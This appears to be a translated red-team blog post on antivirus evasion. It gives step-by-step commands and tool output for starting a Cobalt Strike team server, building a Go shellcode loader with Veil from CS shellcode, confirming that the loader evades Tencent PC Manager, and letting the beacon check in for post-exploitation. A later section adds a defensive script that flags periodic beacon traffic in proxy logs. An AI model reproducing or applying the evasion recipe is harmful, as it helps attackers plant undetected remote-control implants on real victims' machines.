Notes on One Round of Bypassing Antivirus Software


1. Background

During red team engagements the target machine often has some antivirus product installed, such as 360 or Tencent PC Manager. As a result, the payloads I generate frequently cannot be used at all and get forcibly deleted by the AV. This is really annoying, annoying to death! The only option was to stop and look into how AV works and how to get around it. I am writing it down here as a memo.

2. Tools Used

Cobalt Strike: a tool used in red team engagements that provides team collaboration and payload generation. It consists of two parts, a team server and a client; the team server runs only on Linux, while the client runs on macOS, Windows and Linux. Java must be installed before it can run.

Link: https://www.cobaltstrike.com/

Veil: a tool for generating payloads that evade antivirus software.

Link: https://github.com/Veil-Framework/Veil

3. Evasion Steps

3.1 Set up the CS team server and client

A reminder: if the files in the extracted CS directory lack execute permission, CS will not start, so grant execute permission to the files in the CS directory:
```
chmod +x <filename>
```
Start the CS team server:
```
(base) [email protected]:~/python/cs4.0# ifconfig
eth0: flags=4163 mtu 1500
inet 192.168.91.156 netmask 255.255.255.0 broadcast 192.168.91.255
inet6 fe80::20c:33ff:dfbf:dfa3 prefixlen 64 scopeid 0x20
ether 00:0c:29:bf:3a:23 txqueuelen 1000 (Ethernet)
RX packets 130003 bytes 193285222 (184.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 81397 bytes 4399635 (4.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000

lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 24 bytes 1356 (1.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24 bytes 1356 (1.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(base) [email protected]:~/python/cs4.0# ./teamserver 192.168.91.156 123456
[*] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA256 hash of SSL cert is:
[+] Listener: test started!
```
Start the CS client.

Click [Connect] to open the CS client.

3.2 Generate the payload with CS

Set the listener type to HTTP.

Click [Choose] and save the generated payload to a folder for later use.

3.3 Install Veil

On Kali it is recommended to use the quick install commands:
```
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
```

The install is fairly slow and needs a proxy.

The installer downloads and installs the dependencies automatically. Once it finishes, type veil in a terminal; the following banner means the install succeeded:
```
(base) [email protected]:~# veil
===============================================================================
Veil | [Version]: 3.1.12
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

2 tools loaded

Available Tools:

1)  Evasion
2)  Ordnance

Available Commands:

exit            Completely exit Veil
info            Information on a specific tool
list            List available tools
options         Show Veil configuration
update          Update Veil
use         Use a specific tool

Veil>:
```

3.4 Generate the evasive payload

In Veil, type:
```
use 1
```

Veil has 41 payload modules in total; type list to see them all.
```
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Available Payloads:
 1) autoit/shellcode_inject/flat.py
 2) auxiliary/coldwar_wrapper.py
 3) auxiliary/macro_converter.py
 4) auxiliary/pyinstaller_wrapper.py
 5) c/meterpreter/rev_http.py
 6) c/meterpreter/rev_http_service.py
 7) c/meterpreter/rev_tcp.py
 8) c/meterpreter/rev_tcp_service.py
 9) cs/meterpreter/rev_http.py
10) cs/meterpreter/rev_https.py
11) cs/meterpreter/rev_tcp.py
12) cs/shellcode_inject/base64.py
13) cs/shellcode_inject/virtual.py
14) go/meterpreter/rev_http.py
15) go/meterpreter/rev_https.py
16) go/meterpreter/rev_tcp.py
17) go/shellcode_inject/virtual.py
18) lua/shellcode_inject/flat.py
19) perl/shellcode_inject/flat.py
20) powershell/meterpreter/rev_http.py
21) powershell/meterpreter/rev_https.py
22) powershell/meterpreter/rev_tcp.py
23) powershell/shellcode_inject/psexec_virtual.py
24) powershell/shellcode_inject/virtual.py
25) python/meterpreter/bind_tcp.py
26) python/meterpreter/rev_http.py
27) python/meterpreter/rev_https.py
28) python/meterpreter/rev_tcp.py
29) python/shellcode_inject/aes_encrypt.py
30) python/shellcode_inject/arc_encrypt.py
31) python/shellcode_inject/base64_substitution.py
32) python/shellcode_inject/des_encrypt.py
33) python/shellcode_inject/flat.py
34) python/shellcode_inject/letter_substitution.py
35) python/shellcode_inject/pidinject.py
36) python/shellcode_inject/stallion.py
37) ruby/meterpreter/rev_http.py
38) ruby/meterpreter/rev_https.py
39) ruby/meterpreter/rev_tcp.py
40) ruby/shellcode_inject/base64.py
41) ruby/shellcode_inject/flat.py
```

We pick the Go module to build the shellcode loader.
```
Veil/Evasion>: use 17
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 Payload Information:

    Name:           Golang Flat Shellcode Injector
    Language:       go
    Rating:         Normal
    Description:    Golang VirtualAlloc method for inline shellcode
                    injection

Payload: go/shellcode_inject/virtual selected

 Required Options:

Name             Value    Description
----             -----    -----------
BADMACS          FALSE    Check for VM based MAC addresses
CLICKTRACK       X        Require X number of clicks before execution
COMPILE_TO_EXE   Y        Compile to an executable
CURSORCHECK      FALSE    Check for mouse movements
DISKSIZE         X        Check for a minimum number of gigs for hard disk
HOSTNAME         X        Optional: Required system hostname
INJECT_METHOD    Virtual  Virtual or Heap
MINPROCS         X        Minimum number of running processes
PROCCHECK        FALSE    Check for active VM processes
PROCESSORS       X        Optional: Minimum number of processors
RAMCHECK         FALSE    Check for at least 3 gigs of RAM
SLEEP            X        Optional: Sleep "Y" seconds, check if accelerated
USERNAME         X        Optional: The required user account
USERPROMPT       FALSE    Prompt user prior to injection
UTCCHECK         FALSE    Check if system uses UTC time

 Available Commands:

    back        Go back to Veil-Evasion
    exit        Completely exit Veil
    generate    Generate the payload
    options     Show the shellcode's options
    set         Set shellcode option
```

Type generate:
```
[?] Generate or supply custom shellcode?
     1 - Ordnance (default)
     2 - MSFVenom
     3 - Custom shellcode string
     4 - File with shellcode (\x41\x42..)
     5 - Binary file with shellcode
 [>] Please enter the number of your choice: 3
 [>] Please enter custom shellcode (one line, no quotes, \x00.. format):
```
Paste the payload generated by CS at this prompt and set an output file name; the result is an evasive payload.
```
 [*] Using pre-generated shellcode...
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [>] Please enter the base name for output files (default is payload): helloworld.exe
runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
internal/syscall/windows/sysdll
unicode/utf16
unicode/utf8
sync
io
syscall
strconv
internal/syscall/windows
internal/syscall/windows/registry
time
reflect
os
fmt
command-line-arguments
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
 [*] Language: go
 [*] Payload Module: go/shellcode_inject/virtual
 [*] Executable written to: /var/lib/veil/output/compiled/helloworld.exe.exe
 [*] Source code written to: /var/lib/veil/output/source/helloworld.exe.go
```
The shell prints where the generated payload is stored. Find that file, drop it into a virtual machine with Tencent PC Manager installed and run it to see whether it gets flagged.

Next, scan the freshly generated payload with PC Manager.

It gets past Tencent PC Manager. All that is left is to double-click it, wait for the beacon to check in to CS, and go all in on the post-exploitation phase.
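From the defender's side, the HTTP listener configured above means the implant has to call back to the team server at roughly regular intervals, and that rhythm survives even when the file itself slips past AV. The script below is an added example written for this post; it is not code from the post, from Cobalt Strike or from Veil. It groups web-proxy log lines by client, server and URI and flags tuples whose inter-request gaps are nearly constant. The log format, the hosts, the URIs and the thresholds (at least 5 requests, coefficient of variation at most 0.2) are assumptions made for the demonstration, and the log lines are constructed, not captured traffic.

```python
"""Flag beacon-like periodic HTTP callbacks in web-proxy logs.

Added example for this post; not part of Cobalt Strike or Veil. The log
format, hosts, URIs and thresholds are assumptions for the demonstration.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy log: "<ISO time> <client> <server> <method> <uri>".
# The 203.0.113.10 group mimics an implant checking in about once a minute
# with a little jitter; the 10.0.0.20 group is ordinary, irregular browsing.
SAMPLE_LOG = """\
2020-03-10T09:00:00 10.0.0.5 203.0.113.10 GET /updates.rss
2020-03-10T09:00:05 10.0.0.5 10.0.0.20 GET /index.html
2020-03-10T09:00:07 10.0.0.5 10.0.0.20 GET /index.html
2020-03-10T09:00:40 10.0.0.5 10.0.0.20 GET /index.html
2020-03-10T09:01:02 10.0.0.5 203.0.113.10 GET /updates.rss
2020-03-10T09:01:58 10.0.0.5 203.0.113.10 GET /updates.rss
2020-03-10T09:03:01 10.0.0.5 203.0.113.10 GET /updates.rss
2020-03-10T09:04:00 10.0.0.5 203.0.113.10 GET /updates.rss
2020-03-10T09:04:59 10.0.0.5 203.0.113.10 GET /updates.rss
2020-03-10T09:05:12 10.0.0.5 10.0.0.20 GET /index.html
2020-03-10T09:05:13 10.0.0.5 10.0.0.20 GET /index.html
2020-03-10T09:17:30 10.0.0.5 10.0.0.20 GET /index.html
2020-03-10T09:20:00 10.0.0.7 10.0.0.20 GET /login
2020-03-10T09:21:00 10.0.0.7 10.0.0.20 GET /login
"""


def parse_log(text):
    """Group request timestamps by (client, server, uri)."""
    groups = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, server, _method, uri = line.split()
        groups[(client, server, uri)].append(datetime.fromisoformat(ts))
    return groups


def detect_beacons(text, min_requests=5, max_cv=0.2):
    """Return tuples whose inter-request intervals are nearly constant.

    cv is the coefficient of variation (population stdev / mean) of the
    gaps between consecutive requests; a low cv means a fixed sleep with
    little jitter. Tuples with fewer than min_requests hits are skipped,
    since a handful of requests cannot establish a rhythm.
    """
    findings = []
    for (client, server, uri), stamps in parse_log(text).items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # duplicate timestamps only; nothing to measure
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({"client": client, "server": server, "uri": uri,
                             "count": len(stamps), "mean_interval": avg,
                             "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for f in detect_beacons(SAMPLE_LOG):
        print(f"{f['client']} -> {f['server']}{f['uri']}: {f['count']} hits, "
              f"~{f['mean_interval']:.0f}s apart, cv={f['cv']}")
```

On the constructed log only the 203.0.113.10 tuple is reported (six hits about 60 seconds apart, cv around 0.04); the intranet browsing has wildly varying gaps and the two-request group is too short to judge. A fixed cv threshold is deliberately simple: an implant configured with a long sleep and heavy jitter, or one whose operator changes the interval mid-session, will spread its gaps out, so in practice this check is one signal to combine with others (destination reputation, user-agent and URI consistency, request and response sizes) rather than a verdict on its own.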

The above is for security research only; do not use it for anything illegal. Hold your own line and stay a law-abiding citizen.
